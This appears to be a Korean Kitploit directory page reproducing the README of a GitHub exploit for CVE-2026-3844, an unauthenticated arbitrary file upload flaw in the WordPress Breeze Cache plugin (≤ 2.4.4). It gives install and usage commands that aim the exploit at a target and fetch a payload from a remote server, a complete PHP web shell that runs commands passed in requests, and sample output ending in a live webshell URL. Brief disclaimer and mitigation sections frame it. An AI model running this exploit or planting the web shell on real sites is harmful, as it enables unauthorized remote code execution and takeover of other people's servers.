Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
Vulnerability ScannersExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - 인증되지 않은 임의 파일 업로드

저장소 보기
1124개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - 인증 없는 임의 파일 업로드

MIT License Python 3.6+ WordPress


⚠️ 면책 조항

root@kitploit:~
이 도구는 교육 및 보안 연구 목적으로만 제공됩니다.
승인되지 않은 컴퓨터 시스템 접근은 불법입니다. 이 도구는 소유한 시스템이나
명시적 테스트 허가를 받은 시스템에서만 사용하십시오. 저자는 이 소프트웨어로 인한
오용 또는 손해에 대해 어떠한 책임도 지지 않습니다.

📋 설명

CVE-2026-3844는 WordPress용 Breeze Cache 플러그인(버전 ≤ 2.4.4)의 심각한 인증 없는 임의 파일 업로드 취약점입니다. 이 플러그인은 댓글의 srcset 매개변수를 제대로 검증하지 않아, 원격 공격자가 악성 파일(웹셸 포함)을 서버에 업로드할 수 있습니다.

🔴 심각도

  • CVSS 점수: 9.8 (Critical)
  • 공격 경로: 네트워크
  • 인증 필요 여부: 아니요
  • 영향: 원격 코드 실행 (RCE)

🎯 영향을 받는 버전

  • Breeze Cache ≤ 2.4.4
  • WordPress 모든 버전 (플러그인 의존)

🔧 기술적 세부 사항

이 취약점은 Breeze의 Gravatar 캐싱 기능을 악용합니다. 원격 파일 URL이 포함된 특수하게 조작된 srcset 매개변수로 댓글이 게시되면, Breeze는 파일을 다운로드하여 다음 위치에 로컬로 저장합니다:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]

전제 조건: Breeze 설정에서 "Host Files Locally - Gravatars" 옵션이 활성화되어 있어야 합니다.

🚀 설치

root@kitploit:~
# 저장소 클론
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# 의존성 설치
pip install pycurl termcolor

💻 사용법

기본 사용법

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

고급 옵션

root@kitploit:~
# 악용 없이 대상이 취약한지 확인
python3 CVE-2026-3844.py -u http://target.com --check-only

# 사용자 정의 페이로드 URL 사용
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# 출력을 파일로 저장
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# 느린 대상에 대한 타임아웃 증가
python3 CVE-2026-3844.py -u http://target.com --timeout 30

명령줄 인수

인수설명
-u, --url대상 URL (필수)
-p, --payload원격 페이로드 URL
--timeout요청 타임아웃(초) (기본값: 15)
--check-only대상이 취약한지만 확인
-o, --output셸 URL을 파일로 저장

📝 사용자 정의 페이로드 예시

자체 웹셸(shell.php)을 생성하세요:

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

접근 가능한 곳에 호스팅한 후 다음을 사용하세요:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 검증 문자열

이 익스플로잇은 업로드된 파일에서 검증 문자열 4356452d323032362d33383434 (hex 인코딩된 "CVE-2026-3844")를 자동으로 확인하여 성공적인 악용을 확인합니다.

🛡️ 완화 조치

  1. Breeze Cache를 버전 2.4.5 이상으로 업데이트
  2. 필요하지 않으면 "Host Files Locally - Gravatars" 비활성화
  3. 웹 애플리케이션 방화벽(WAF) 규칙 구현
  4. 댓글 기능 정기적으로 감사

📸 스크린샷

root@kitploit:~
[*] PHASE 1: VULNERABILITY ASSESSMENT
[*] Checking Breeze plugin version...
[+] Target VULNERABLE (Breeze v2.4.4)

[*] PHASE 2: EXPLOITATION
[!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED
[*] Step 1: Sending malicious comment...
[+] Comment posted successfully
[*] Step 2: Waiting for Breeze to cache the file...
[*] Step 3: Checking for uploaded file...
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!

[✓] STATUS: SUCCESS
[✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 디렉터리 구조

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Main exploit script
├── README.md            # This file
└── LICENSE              # MIT License

📄 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.

🙏 크레딧

  • 저자: 0xgh057r3c0n
  • 발견: 보안 연구팀
  • CVE ID: CVE-2026-3844

📞 연락처

  • GitHub: @0xgh057r3c0n
  • 이슈 보고: GitHub Issues

⭐ 지원

이 도구가 유용하다면 GitHub에서 별표 ⭐를 눌러주세요!


🐍 Python으로 제작 | 교육 목적으로만 사용
도구 다운로드